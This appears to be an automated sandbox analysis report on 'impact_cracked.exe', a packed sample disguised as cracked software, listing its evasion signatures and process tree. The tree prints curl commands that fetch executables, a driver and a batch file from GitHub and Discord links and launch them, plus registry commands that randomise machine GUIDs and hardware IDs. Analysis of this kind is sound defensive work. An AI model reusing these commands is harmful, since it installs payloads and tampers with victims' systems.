Analysis
-
max time kernel
74s -
max time network
80s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
22/12/2023, 00:14
General
-
Target
impact_cracked.exe
-
Size
6.1MB
-
MD5
f8164877a685b3ff1aa8a4c7292e699c
-
SHA1
279aba8c802d15f3507210b6bf702b678e30f5a3
-
SHA256
20ffe6d5ffeefecc28bef795ba84e3bb8339522e103c32705b0360f24051b12c
-
SHA512
f381a0789c50a89022acfc764766931ee43577637f6e11240ee6eade6a62f5e84a8c8b68fd2b240eddf184278693279e8a84a4863f2025f568e8acf0833d653c
-
SSDEEP
98304:IB38757d1xzB92ETr/SG/e6ML0kySVPziZ42xBTBcSn7JNXjEFsZg5:Gs7D1xH3/SG/KL0fSNmZ9xhBj7zzes6
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ AppleCleaner.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion AppleCleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion AppleCleaner.exe -
Executes dropped EXE 1 IoCs
pid Process 3192 AppleCleaner.exe -
resource yara_rule behavioral1/files/0x000300000001e7e7-9.dat themida behavioral1/memory/3192-10-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp themida behavioral1/files/0x000300000001e7e7-11.dat themida behavioral1/memory/3192-13-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp themida behavioral1/memory/3192-14-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp themida behavioral1/memory/3192-15-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp themida behavioral1/memory/3192-16-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp themida -
resource yara_rule behavioral1/memory/4948-0-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp vmprotect behavioral1/memory/4948-2-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp vmprotect behavioral1/memory/4948-6-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp vmprotect -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA AppleCleaner.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3192 AppleCleaner.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\GameBarPresenceWriter\Solution.exe curl.exe File created C:\Windows\GameBarPresenceWriter\Solution64.sys curl.exe File created C:\Windows\GameBarPresenceWriter\Disk1.exe curl.exe File created C:\Windows\GameBarPresenceWriter\Disk2.exe curl.exe File created C:\Windows\GameBarPresenceWriter\Mac.bat curl.exe File created C:\Windows\IME\AppleCleaner.exe curl.exe -
Modifies registry key 1 TTPs 10 IoCs
pid Process 3792 reg.exe 1332 reg.exe 4060 reg.exe 2856 reg.exe 1836 reg.exe 5084 reg.exe 672 reg.exe 5096 reg.exe 3332 reg.exe 3120 reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4948 impact_cracked.exe 4948 impact_cracked.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4948 impact_cracked.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4948 wrote to memory of 928 4948 impact_cracked.exe 88 PID 4948 wrote to memory of 928 4948 impact_cracked.exe 88 PID 928 wrote to memory of 4752 928 cmd.exe 90 PID 928 wrote to memory of 4752 928 cmd.exe 90 PID 928 wrote to memory of 3264 928 cmd.exe 92 PID 928 wrote to memory of 3264 928 cmd.exe 92 PID 928 wrote to memory of 4584 928 cmd.exe 93 PID 928 wrote to memory of 4584 928 cmd.exe 93 PID 4948 wrote to memory of 4984 4948 impact_cracked.exe 100 PID 4948 wrote to memory of 4984 4948 impact_cracked.exe 100 PID 4984 wrote to memory of 640 4984 cmd.exe 102 PID 4984 wrote to memory of 640 4984 cmd.exe 102 PID 4948 wrote to memory of 1244 4948 impact_cracked.exe 104 PID 4948 wrote to memory of 1244 4948 impact_cracked.exe 104 PID 1244 wrote to memory of 3192 1244 cmd.exe 106 PID 1244 wrote to memory of 3192 1244 cmd.exe 106 PID 4948 wrote to memory of 1116 4948 impact_cracked.exe 108 PID 4948 wrote to memory of 1116 4948 impact_cracked.exe 108 PID 4948 wrote to memory of 5060 4948 impact_cracked.exe 110 PID 4948 wrote to memory of 5060 4948 impact_cracked.exe 110 PID 4948 wrote to memory of 1944 4948 impact_cracked.exe 112 PID 4948 wrote to memory of 1944 4948 impact_cracked.exe 112 PID 1944 wrote to memory of 1032 1944 cmd.exe 114 PID 1944 wrote to memory of 1032 1944 cmd.exe 114 PID 4948 wrote to memory of 4500 4948 impact_cracked.exe 115 PID 4948 wrote to memory of 4500 4948 impact_cracked.exe 115 PID 4500 wrote to memory of 1012 4500 cmd.exe 117 PID 4500 wrote to memory of 1012 4500 cmd.exe 117 PID 4948 wrote to memory of 1800 4948 impact_cracked.exe 118 PID 4948 wrote to memory of 1800 4948 impact_cracked.exe 118 PID 1800 wrote to memory of 1020 1800 cmd.exe 120 PID 1800 wrote to memory of 1020 1800 cmd.exe 120 PID 4948 wrote to memory of 920 4948 impact_cracked.exe 121 PID 4948 wrote to memory of 920 4948 impact_cracked.exe 121 PID 920 wrote to memory of 2128 920 cmd.exe 123 PID 920 wrote to memory of 2128 920 cmd.exe 123 PID 4948 wrote to memory of 1444 4948 impact_cracked.exe 124 PID 4948 wrote to memory of 1444 4948 impact_cracked.exe 124 PID 1444 wrote to memory of 4812 1444 cmd.exe 126 PID 1444 wrote to memory of 4812 1444 cmd.exe 126 PID 4948 wrote to memory of 2992 4948 impact_cracked.exe 127 PID 4948 wrote to memory of 2992 4948 impact_cracked.exe 127 PID 2992 wrote to memory of 3792 2992 cmd.exe 129 PID 2992 wrote to memory of 3792 2992 cmd.exe 129 PID 4948 wrote to memory of 812 4948 impact_cracked.exe 130 PID 4948 wrote to memory of 812 4948 impact_cracked.exe 130 PID 812 wrote to memory of 672 812 cmd.exe 132 PID 812 wrote to memory of 672 812 cmd.exe 132 PID 4948 wrote to memory of 4384 4948 impact_cracked.exe 133 PID 4948 wrote to memory of 4384 4948 impact_cracked.exe 133 PID 4384 wrote to memory of 1332 4384 cmd.exe 135 PID 4384 wrote to memory of 1332 4384 cmd.exe 135 PID 4948 wrote to memory of 1688 4948 impact_cracked.exe 136 PID 4948 wrote to memory of 1688 4948 impact_cracked.exe 136 PID 1688 wrote to memory of 5096 1688 cmd.exe 138 PID 1688 wrote to memory of 5096 1688 cmd.exe 138 PID 4948 wrote to memory of 2924 4948 impact_cracked.exe 139 PID 4948 wrote to memory of 2924 4948 impact_cracked.exe 139 PID 2924 wrote to memory of 4060 2924 cmd.exe 141 PID 2924 wrote to memory of 4060 2924 cmd.exe 141 PID 4948 wrote to memory of 3640 4948 impact_cracked.exe 142 PID 4948 wrote to memory of 3640 4948 impact_cracked.exe 142 PID 3640 wrote to memory of 2856 3640 cmd.exe 144 PID 3640 wrote to memory of 2856 3640 cmd.exe 144
Processes
-
C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe"C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD5 | find /i /v "md5" | find /i /v "certutil"2⤵
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD53⤵PID:4752
-
-
C:\Windows\system32\find.exefind /i /v "md5"3⤵PID:3264
-
-
C:\Windows\system32\find.exefind /i /v "certutil"3⤵PID:4584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\system32\curl.execurl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe3⤵
- Drops file in Windows directory
PID:640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Windows\IME\AppleCleaner.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\IME\AppleCleaner.exeC:\Windows\IME\AppleCleaner.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\IME\AppleCleaner.exe2⤵PID:1116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:5060
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500820504596/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe >nul2⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\system32\curl.execurl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500820504596/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe3⤵
- Drops file in Windows directory
PID:1032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys >nul2⤵
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\system32\curl.execurl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys3⤵
- Drops file in Windows directory
PID:1012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501659365396/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe >nul2⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\curl.execurl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501659365396/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe3⤵
- Drops file in Windows directory
PID:1020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500023586896/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe >nul2⤵
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\system32\curl.execurl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500023586896/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe3⤵
- Drops file in Windows directory
PID:2128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500342362132/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat >nul2⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\system32\curl.execurl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500342362132/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat3⤵
- Drops file in Windows directory
PID:4812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul2⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 6131 /f3⤵
- Modifies registry key
PID:3792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul2⤵
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 6131 /f3⤵
- Modifies registry key
PID:672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul2⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {613121375-3155415346-1546629722} /f3⤵
- Modifies registry key
PID:1332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f2⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 613432124-166506641-25780881 /f3⤵
- Modifies registry key
PID:5096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul2⤵
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\system32\reg.exeREG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {613432124-166506641-25780881} /f3⤵
- Modifies registry key
PID:4060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul2⤵
- Suspicious use of WriteProcessMemory
PID:3640 -
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {613432124-166506641-25780881} /f3⤵
- Modifies registry key
PID:2856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f2⤵PID:3488
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 613432124-166506641-25780881 /f3⤵
- Modifies registry key
PID:1836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f2⤵PID:4540
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 613432124-166506641-25780881 /f3⤵
- Modifies registry key
PID:5084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f2⤵PID:1876
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 613710104-174630705-33274807 /f3⤵
- Modifies registry key
PID:3332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul2⤵PID:4216
-
C:\Windows\system32\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 613710104-174630705-33274807 /f3⤵
- Modifies registry key
PID:3120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul2⤵PID:2636
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
MD54639664afed57a9e2ebb0373a715f159
SHA1a7c166c3eac948aed501aac067214001df4e09b6
SHA256af9e98021b05a245873ccf8bc952f89a2a856ad70323ab2d5a6687bdf811fbd3
SHA5125b042a548cb1441b7e5fb2d526db386f0d842d998a8ff5685c9516db5402ad2d1dd7317be22e9c62349d46f961382cbc64db59564f54fe045f507791efea8ff9
-
Filesize
3.6MB
MD5f96eb2236970fb3ea97101b923af4228
SHA1e0eed80f1054acbf5389a7b8860a4503dd3e184a
SHA25646fe5192387d3f897a134d29c069ebf39c72094c892134d2f0e77b12b11a6172
SHA5122fd2d28c5f571d40b43a4dd7a22d367ba42420c29627f21ca0a2052070ffb9f689d80dad638238189eed26ed19af626f47e70f1207e10007041c620dac323cc7